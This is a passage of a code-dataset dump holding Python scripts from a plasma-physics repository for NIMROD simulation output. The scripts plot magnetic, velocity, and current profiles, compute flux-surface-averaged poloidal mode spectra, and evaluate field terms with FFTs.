$R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],J0T[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$J0T$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n plt.tight_layout()\n filename=files[0].split('.')\n plt.savefig(filename[0]+\"_eq_findex.png\",bbox_inches='tight')\n\n\n fig=plt.figure(figsize=(12,12))\n #plt.subplots_adjust(left=0.10, bottom=0.12, right=0.95, top=0.92, wspace=0.175)\n ax=fig.add_subplot(431)\n plt.title(r'$B_R$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],BRr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B_R$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(432)\n plt.title(r'$B_Z$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],BZr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B_Z$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(433)\n plt.title(r'$B_\\phi$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],BTr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B_\\phi$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n\n\n ax=fig.add_subplot(434)\n plt.title(r'$V_R$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],VRr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$V_R$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(435)\n plt.title(r'$V_Z$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],VZr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$V_Z$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(436)\n plt.title(r'$V_\\phi$ v. 
$R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],VTr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n\n sm = cm.ScalarMappable(cmap=cm.rainbow, norm=plt.Normalize(vmin=min(slicesy), vmax=max(slicesy)))\n # fake up the array of the scalar mappable. Urgh...\n sm._A = []\n cx=plt.colorbar(sm)\n cx.set_ticks(slicesy)\n\n ax.set_ylabel(r'$V_\\phi$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(437)\n plt.title(r'$J_R$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],JRr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$J_R$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(438)\n plt.title(r'$J_\\theta$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],JZr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$J_\\theta$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(439)\n plt.title(r'$J_\\phi$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],JTr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$J_\\phi$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(4,3,10)\n plt.title(r'Real($P$) v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],Pr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'Real($P$)',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(4,3,11)\n plt.title(r'Real($T_i$) v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],TIr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'Real($T_i$)',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(4,3,12)\n plt.title(r'Real($n$) v. 
$R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],Nr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'Real($n$)',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n plt.tight_layout()\n #plt.show()\n filename=files[0].split('.')\n if len(filename)==3:\n plt.savefig(filename[0]+'_findex.'+filename[1]+\".png\",bbox_inches='tight')\n else:\n plt.savefig(filename[0]+\"_findex.png\",bbox_inches='tight')\n\n plt.show()\n\n\n" }, { "alpha_fraction": 0.6005141139030457, "alphanum_fraction": 0.6258642077445984, "avg_line_length": 31.701448440551758, "blob_id": "658a0217794764743f422ffc3ce91ea4e3029a5e", "content_id": "eb02732d4779cb9f5ff6b130abb18da050c7317b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11282, "license_type": "no_license", "max_line_length": 90, "num_lines": 345, "path": "/surfmn/fsa_surfmn.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n#profiles is a class for calculating 1D profiles\n# using the flux surface integration\n#\n#\nimport f90nml\nimport eval_comp_nimrod as ceval\n#from field_class import *\n#import comp_fsa as cfsa\nimport comp_fsa as cfsa\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nfrom scipy.interpolate import interp1d,splev,UnivariateSpline\nimport os\nimport h5py\nimport sys\nimport numpy as np\nimport pickle\n\nclass fsasurfmn:\n def __init__(self,dumpfile,nimrodin):\n #start with dump file and nimrod.in info\n self.dumpfile=dumpfile\n self.nimrodin=nimrodin\n self.time=None\n self.step=None\n # next include info on how fsa's were performed\n self.mmax=None\n self.ifour=[]\n self.nfour=None\n self.setprofiles=False\n #finally end with the profiles\n self.psin=np.empty([1])\n self.psi=np.empty([1])\n self.rhon=np.empty([1])\n self.q=np.empty([1])\n self.qpsi=np.empty([1])\n self.vprime=np.empty([1])\n self.bmn=np.empty([1])\n self.bcmn=np.empty([1])\n self.bsmn=np.empty([1])\n def dump(self,file):\n pickle.dump(self.dumpfile,file)\n pickle.dump(self.nimrodin,file)\n pickle.dump(self.time,file)\n pickle.dump(self.step,file)\n # next include info on how fsa's were performed\n pickle.dump(self.mmax,file)\n pickle.dump(self.ifour,file)\n pickle.dump(self.nfour,file)\n pickle.dump(self.setprofiles,file)\n #finally end with the profiles\n if self.setprofiles==True:\n pickle.dump(self.psin,file)\n pickle.dump(self.psi,file)\n pickle.dump(self.rhon,file)\n pickle.dump(self.q,file)\n pickle.dump(self.vprime,file)\n pickle.dump(self.bmn,file)\n pickle.dump(self.bcmn,file)\n pickle.dump(self.bsmn,file)\n def load(self,file):\n self.dumpfile=pickle.load(file)\n self.nimrodin=pickle.load(file)\n self.time=pickle.load(file)\n self.step=pickle.load(file)\n # next include info on how fsa's were performed\n self.mmax=pickle.load(file)\n self.ifour=pickle.load(file)\n self.nfour=pickle.load(file)\n self.setprofiles=pickle.load(file)\n #finally end with the profiles\n if self.setprofiles==True:\n self.psin=pickle.load(file)\n self.psi=pickle.load(file)\n self.rhon=pickle.load(file)\n self.q=pickle.load(file)\n self.vprime=pickle.load(file)\n self.bmn=pickle.load(file)\n self.bcmn=pickle.load(file)\n self.bsmn=pickle.load(file)\n\n 
def get_m_index(self,m):\n '''Return the index for the given m\n Return None if m is out of range'''\n if self.mmax==None:\n write(\"mmax has not be set in get_m_index\")\n raise\n else:\n if m>self.mmax:\n return None\n elif m<-1*self.mmax:\n return None\n else:\n return m+self.mmax\n def dummy_fsa(self,rzc,y,dy,evalnimrod,flag,fargs):\n '''\n Dummy integrand for complex fsa, this is used to get v' and q\n without running a true fsa\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth :v'\n dy(3)=dq: q\n '''\n dy[4]=1.0\n return dy\n\n def surfmn_int(self,rzc,y,dy,evalnimrod,flag,fargs):\n '''\n Integrand for fluxsurface integration\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth\n dy(3)=dq\n dy(4)=dtheta\n '''\n\n #self.mmax=fargs.get(\"mmax\")\n\n\n b0=np.array(cfsa.get_b0(evalnimrod,rzc,flag))\n b = evalnimrod.eval_field('b', rzc, dmode=0)\n\n\n rr =rzc[0]\n q=self.qpsi(fargs.get('psi'))\n jac=rr*q/b0[2]\n dy[4]=dy[2]/jac #dtheta\n for ii, im in enumerate(self.ifour):\n oset = ii * (4*self.mmax+1)\n reb=np.real(b[:,im+1])\n imb=np.imag(b[:,im+1])\n rBePsi=rr*(reb[1]*b0[0]-reb[0]*b0[1])\n iBePsi=rr*(imb[1]*b0[0]-imb[0]*b0[1])\n for im in range(self.mmax):\n nmth=-(self.mmax-im)*y[4] #negative m theta\n pmth=(im+1)*y[4] #positive m theta\n dy[5+im+oset]=(rBePsi*np.cos(nmth)-iBePsi*np.sin(nmth))*dy[2]\n dy[6+self.mmax+im+oset]=(rBePsi*np.cos(pmth)-iBePsi*np.sin(pmth))*dy[2]\n dy[6+2*self.mmax+im+oset]=-(rBePsi*np.sin(nmth)+iBePsi*np.cos(nmth))*dy[2]\n dy[6+3*self.mmax+im+oset]=-(rBePsi*np.sin(pmth)+iBePsi*np.cos(pmth))*dy[2]\n dy[5+self.mmax+oset]=rBePsi*dy[2]\n return dy\n\n\n def get_rho_q(self,q):\n try:\n return interp1d(self.q,self.rhon, kind='cubic',fill_value=\"extrapolate\")(q)\n except:\n print(f\"The safety factor {q} is not it the domain\")\n raise\n\n def get_field_rho(self,field,rhon):\n try:\n return interp1d(self.rhon,field, kind='cubic')(rhon)\n except:\n print(f\"Problem evaluitng field at rhon={rhon}\")\n raise\n\n def calculate(self,rzo=None,rzx=None,nsurf=150,eqflag=0,fargs={},**kwargs):\n print(\"in calculate\")\n mi=kwargs.get(\"mi\",3.3435860e-27)\n qe=kwargs.get(\"qe\",1.609e-19)\n self.ifour=fargs.get(\"ifour\")\n self.mmax=fargs['mmax']\n self.nfour=len(fargs['ifour'])\n self.setprofiles=True\n\n #first call to fsa is to calcualte q\n print(\"before ceval\")\n cevalnimrod=ceval.EvalCompNimrod(self.dumpfile,fieldlist='nvptbj')\n print(\"after ceval\")\n dvar, yvar, contours = cfsa.FSA(cevalnimrod, rzo, self.dummy_fsa, 1, \\\n nsurf=nsurf,depvar='eta',dpow=0.5,rzx=rzx,flag=eqflag,normalize=True, \\\n fargs=fargs)\n\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n #unevaluated interpoate\n self.qpsi=interp1d(dvar[2,:iend], dvar[7,:iend], kind='cubic')\n\n #second call to fsa is to calcualte b_ms ans psi_mn\n neq=1+self.nfour*(4*self.mmax+1)\n dvar,yvar,contours = cfsa.FSA(cevalnimrod, rzo, self.surfmn_int, neq, \\\n nsurf=nsurf,depvar='eta', dpow=0.5,rzx=rzx,flag=eqflag,normalize=False,\\\n fargs=fargs)\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n\n bmn=np.zeros([self.nfour,2*self.mmax+1,iend])\n bcmn=np.zeros([self.nfour,2*self.mmax+1,iend])\n bsmn=np.zeros([self.nfour,2*self.mmax+1,iend])\n for ii in range(self.nfour):\n oset = ii * (4*self.mmax+1)\n bcmn[ii,:,:]= yvar[1+oset:2*self.mmax+2+oset,:iend]*(np.pi*2.0)\n 
bsmn[ii,0:self.mmax,:]=\\\n yvar[2+2*self.mmax+oset:2+3*self.mmax+oset,:iend]*(np.pi*2.0)\n bsmn[ii,self.mmax+1:2*self.mmax+1,:]=\\\n yvar[2+3*self.mmax+oset:2+4*self.mmax+oset,:iend]*(np.pi*2.0)\n bmn=np.sqrt(np.square(bcmn)+np.square(bsmn))\n rhomin=np.min(dvar[1,:iend])\n rhomax=np.max(dvar[1,:iend])\n self.rhon = np.linspace(rhomin,rhomax,200,endpoint=True)\n #dvars\n self.psin=interp1d(dvar[1,:iend], dvar[0,:iend], kind='cubic')(self.rhon)\n self.psi=interp1d(dvar[1,:iend], dvar[2,:iend], kind='cubic')(self.rhon)\n self.vprime=np.pi*2*interp1d(dvar[1,:iend], dvar[6,:iend], kind='cubic')(self.rhon)\n self.q=interp1d(dvar[1,:iend], dvar[7,:iend], kind='cubic')(self.rhon)\n\n self.bcmn=interp1d(dvar[1,:iend],bcmn, kind='cubic')(self.rhon)\n self.bsmn=interp1d(dvar[1,:iend],bsmn, kind='cubic')(self.rhon)\n self.bmn =interp1d(dvar[1,:iend],bmn , kind='cubic')(self.rhon)\n\n def get_resonance(self,field,nn,mm):\n ''' Evaluate the resonant component of a field at the given resonces'''\n if nn<1:\n print(\"nn must be positive by convention in get_resonance\")\n raise ValueError\n ndex=nn-1 #todo check\n mdex=self.get_m_index(mm)\n if ndex==None:\n print(f\"{nn} is not a n number in surfmn file\")\n raise ValueError\n if mdex==None:\n print(f\"{mm} is not an m number in surfmn file\")\n raise ValueError\n qres=mm/nn\n #if qres<self.qmin or qres>self.qmax:\n # print(qres,self.qmin,self.qmax)\n # print(f\"The q value {qres} is not resonant\")\n # raise ValueError\n resfield=interp1d(self.rhon,self.bmn[ndex,mdex,:])\n return resfield(self.get_rho_q(qres))\n\n def plot(self,pargs={}):\n for im,imode in enumerate(self.ifour):\n self.plot_radial(im,imode,pargs)\n self.plot_surfmn(im,imode,pargs)\n\n def plot_radial(self,ii,imode,pargs={}):\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n title=f\"$\\psi$(n={int(imode)}) at {self.time*1000:.3f}ms\"\n ylabel=f\"$\\psi_m$ [mWb]\"\n colorlist = list(mcolors.TABLEAU_COLORS)\n xlabel=r'$\\rho_N$'\n fontsize=18\n if imode==1:\n mlist=range(-4,1)\n elif imode==2:\n mlist=range(-6,-1)\n else:\n mstart=-2*imode\n mlist=range(mstart,mstart+imode+1)\n if 'mlists' in pargs:\n if ii<len(pargs['mlists'][ii]):\n mlist=pargs['mlists'][ii]\n rhomax=np.max(self.rhon)\n for im,this_m in enumerate(mlist):\n this_i = self.get_m_index(this_m)\n if this_i!= None:\n mlbl = \"m = \" + str(this_m)\n tc=colorlist[im%len(colorlist)]\n ax.plot(self.rhon/rhomax,self.bmn[ii,this_i,:]*1000, color=tc, label=mlbl)\n try:\n qlist=pargs['qlists'][ii]\n except:\n if imode==1:\n qlist=[-4,-3,-2]\n elif imode==2:\n qlist=[-4,-3,-2.5,-2,-1.5]\n elif imode==3:\n qlist=[-3,-2.33, -2,-1.67,-1.33]\n elif imode==4:\n qlist=[-3,-2,-1.75,-1.5,-1.25]\n elif imode==5:\n qlist=[-3,-2,-1.8,-1.6,-1.4,-1.2]\n else:\n qlist=[-4,-3,-2]\n\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho/rhomax,ls=':',color=tc, label=qlbl)\n except:\n print(f\"q={qq:.2f} is not in the domain\")\n ax.axhline(0,ls='-',c='k')\n ax.legend(loc=0,frameon=True,fontsize=fontsize)\n plt.title(title,fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n plt.ylabel(ylabel,fontsize=fontsize)\n plt.tight_layout()\n plt.show()\n\n def plot_surfmn(self,im,imode,surfmn,pargs={}):\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n # Set titles and labels\n title=f\"$\\psi$(n={int(imode)}) at {self.time*1000:.3f}ms\"\n # set contour levels, i could generalize this further if needed\n levels=301\n 
vmax=np.amax(self.bmn[im,:,:])*1000\n levels=np.linspace(0,vmax,301)\n cbar_ticks=np.linspace(0,vmax,11)\n # Update plot based on keys in kwargs\n xlabel=\"Poloidal Mode Number m\"\n fontsize=18\n # set up mrange()\n qmin=np.amin(self.q)\n qmax=np.amax(self.q)\n mrange=np.linspace(qmin,qmax)\n #create the surfmn plot\n plt.set_cmap('nipy_spectral')\n m=range(-self.mmax,self.mmax+1)\n mv, rv = np.meshgrid(m, self.rhon, sparse=False, indexing='ij')\n conf=plt.contourf(mv,rv,np.clip(self.bmn[im,:,:]*1000,0,None),levels=levels,vmax=vmax)\n plt.plot(imode*mrange,self.get_rho_q(mrange),c='w')\n plt.title(title,fontsize=fontsize)\n plt.ylabel(r'$\\rho_N$',fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n cbar=fig.colorbar(conf,ticks=cbar_ticks)\n plt.xlim(-self.mmax,self.mmax)\n plt.show()\n\n def get_dumptime(self):\n ''' Open the hdf5 dumpfile read the dump time and dumpstep\n '''\n with h5py.File(self.dumpfile, 'r') as h5file:\n try:\n self.time=h5file[\"dumpTime\"].attrs['vsTime']\n self.step=int(h5file[\"dumpTime\"].attrs['vsStep'])\n except:\n print(f\"Error reading time or step in {self.dumpfile}\")\n raise\n" }, { "alpha_fraction": 0.532439112663269, "alphanum_fraction": 0.5535719990730286, "avg_line_length": 39.16666793823242, "blob_id": "3d1eeeb198a2ac6cfbcd67f8c7b72434a1af5ebb", "content_id": "31d8eb212cb422e25fc5ac58e01e78ca2fdb157e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 31089, "license_type": "no_license", "max_line_length": 115, "num_lines": 774, "path": "/hocradic/hcFields.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport f90nml\nimport eval_nimrod as eval\nimport field_class as fc\nimport numpy as np\nfrom scipy.fft import fft, ifft, rfft\nimport plot_nimrod as pn\nimport matplotlib.pyplot as plt\nimport time\nimport nim_timer as timer\n\nclass hcfields:\n ''' hc fields is a class for reading/storing nimrod data on a mesh\n it also calculates the different terms in nimrods field advances\n this seperates the evaulation of these fields from fsa interation\n or plotting on various meshs\n '''\n\n def __init__(self,dumpfile,nimrodin):\n self.dumpfile=dumpfile\n self.nimrodin=nimrodin\n self.eval=None\n self.grid=None\n self.fielddict={}\n self.energyDict={}\n self.powerFluxDict={}\n self.advectDict={}\n self.filter=None\n self.evalb_timer=0.0\n self.fft_timer=0.0\n self.ndmode=0\n self.neq=False\n self.ne0=False\n self.npert=False\n self.pdmode=1\n self.peq=False\n self.p0=False\n self.ppert=False\n self.vdmode=0\n self.veq=False\n self.ve0=False\n self.vpert=False\n self.bdmode=0\n self.beq=False\n self.be0=False\n self.bpert=False\n self.jdmode=1\n self.jeq=False\n self.je0=False\n self.jpert=False\n self.diff_dmode=0\n\n if self.nimrodin is not None:\n self.nml=f90nml.read(self.nimrodin)\n self.grid_nml=self.nml.get('grid_input',{})\n self.equil_nml=self.nml.get('equil_input',{})\n self.const_nml=self.nml.get('const_input',{})\n self.physics_nml=self.nml.get('physics_input',{})\n self.closure_nml=self.nml.get('closure_input',{})\n self.solver_nml=self.nml.get('solver_input',{})\n self.output_nml=self.nml.get('output_input',{})\n self.set_physical_constants()\n self.set_evalnimrod()\n return None\n\n def set_physical_constants(self):\n '''\n Read namelists and set physical constants\n '''\n self.mu0=self.const_nml.get('mu0_input',np.pi*4.0e-7)\n self.me=self.const_nml.get('me_input',9.1093898e-31)\n 
self.mi=self.const_nml.get('mi_input',3.3435860e-27)\n self.zeff=self.const_nml.get('zeff_input',1.0)\n self.mtot=self.me + self.mi/self.zeff\n self.qe=self.const_nml.get('chrg_input',1.60217733e-19)\n self.gamma=self.const_nml.get('gam_input',5./3.)\n self.kblz=self.const_nml.get('kblz_input',1.60217733e-19)\n self.clight=self.const_nml.get('c_input',2.99792458e8)\n return None\n\n def set_evalnimrod(self):\n '''\n Set Eval Nimrod\n '''\n if self.eval is None:\n self.eval=eval.EvalNimrod(self.dumpfile,fieldlist='nvbtjpd')\n return None\n\n def get_gridrzp(self,grid):\n '''\n returns grid and rzp, and grid for a given grid\n if grid=None, try self.grid\n elif grid is an EvalGrid insatnace\n else np grid\n '''\n if grid is None:\n if self.grid is None:\n print(\"ntm_fields_grid is not set\")\n raise ValueError\n else:\n grid=self.grid\n rzp=self.grid.rzp\n elif isinstance(grid,eval.EvalGrid):\n rzp=grid.rzp\n else:\n rzp=grid\n return grid,rzp\n\n @timer.timer_func\n def fft(self,pert,axis=-1,type=None):\n ''' NIMROD stores it's field data as f(phi) = sum_{-n}^n f_n exp(inphi)\n This implies that the normalization 1/N should be done in the transform\n from physical space to fourier space\n This is the one option that scipi.fft does not support, but why?\n '''\n #fpert = fft(pert.data,axis=axis,norm=None)/pert.data.shape[axis]\n #try rfft to save space (computation)\n fpert = rfft(pert.data,axis=axis,norm=None)/pert.data.shape[axis]\n if type=='s':\n fpert = fpert[0,...]\n elif type=='v':\n fpert = fpert[0:3,...]\n return fpert\n\n def set_method(self,method):\n if method == \"induction\":\n self.ndmode=1\n self.neq=True\n self.npert=False\n self.vdmode=1\n self.veq=True\n self.vpert=True\n self.beq=True\n self.bpert=True\n self.jeq=True\n self.jpert=True\n self.peq=True\n self.p0=True\n self.ppert=True\n self.diff_dmode=1\n elif method == 'powerflux':\n self.ndmode=1 #check\n self.neq=True\n self.ne0=True\n self.npert=False\n self.vdmode=2\n self.veq=True\n self.ve0=True\n self.vpert=True\n self.bdmode=1\n self.beq=True\n self.be0=True\n self.bpert=True\n self.jdmode=1\n self.jeq=True\n self.je0=True\n self.jpert=True\n self.pdmode=1\n self.peq=True\n self.p0=True\n self.ppert=True\n self.diff_dmode=1\n elif method == 'advectPowerflux':\n self.ndmode=0 #check\n self.neq=True\n self.ne0=True\n self.npert=False\n self.vdmode=1\n self.veq=True\n self.ve0=True\n self.vpert=True\n\n @timer.timer_func\n def eval_symm(self,fname,rzp,dmode,eq):\n if eq not in [1,3]:\n print(\"eval_symm only works for eq=1 or 3\")\n raise ValueError\n newrzp=rzp[:,0]\n field=self.eval.eval_field(fname,newrzp,dmode=dmode,eq=eq)\n field=field.reshape(*field.shape,1)\n field=np.broadcast_to(field,(field.shape[0],rzp.shape[1]))\n return field\n\n @timer.timer_func\n def eval_n(self,grid=None,fft=False):\n grid,rzp=self.get_gridrzp(grid)\n if self.neq or self.ne0:\n if len(rzp.shape)==2:\n field=self.eval_symm('n',rzp,dmode=self.ndmode,eq=1)\n self.fielddict['neq']=fc.Scalar(field,rzp,self.ndmode,True)\n else:\n field=self.eval.eval_field('n', grid, dmode=self.ndmode, eq=1)\n self.fielddict['neq']=fc.Scalar(field,rzp,self.ndmode,True)\n if self.ne0:\n if len(rzp.shape)==2:\n field2=self.eval_symm('n',rzp,dmode=self.ndmode,eq=3)\n field2=field2-field #sutract eq\n self.fielddict['ne0']=fc.Scalar(field2,rzp,self.ndmode,True)\n else:\n field2=self.eval.eval_field('n', grid, dmode=self.ndmode, eq=3)\n field2=field2-field #subtract eq\n self.fielddict['ne0']=fc.Scalar(field2,rzp,self.ndmode,True)\n if self.npert:\n 
field=self.eval.eval_field('n', grid, dmode=self.ndmode, eq=0)\n if self.ne0:\n field=field-field2 #remove n=0 perturbation\n self.fielddict['npert']=fc.Scalar(field,rzp,self.ndmode,True)\n if fft:\n self.fielddict['nfour']=self.fft(field,type='s')\n return None\n\n\n @timer.timer_func\n def eval_v(self,grid=None,fft=False):\n grid,rzp=self.get_gridrzp(grid)\n if self.veq or self.ve0:\n if len(rzp.shape)==2:\n field=self.eval_symm('v',rzp,dmode=self.vdmode,eq=1)\n self.fielddict['veq']=fc.Vector(field,rzp,self.vdmode,True)\n else:\n field=self.eval.eval_field('v', grid, dmode=self.vdmode,eq=1)\n self.fielddict['veq']=fc.Vector(field,rzp,self.vdmode,True)\n if self.ve0:\n if len(rzp.shape)==2:\n field2=self.eval_symm('v',rzp,dmode=self.vdmode,eq=3)\n field2=field2-field #sutract eq\n self.fielddict['ve0']=fc.Vector(field2,rzp,self.vdmode,True)\n else:\n field2=self.eval.eval_field('v', grid, dmode=self.vdmode, eq=3)\n field2=field2-field #subtract eq\n self.fielddict['ve0']=fc.Vector(field2,rzp,self.vdmode,True)\n if self.vpert:\n field=self.eval.eval_field('v', grid, dmode=self.vdmode, eq=0)\n if self.ve0:\n field=field-field2 #subtract n=0 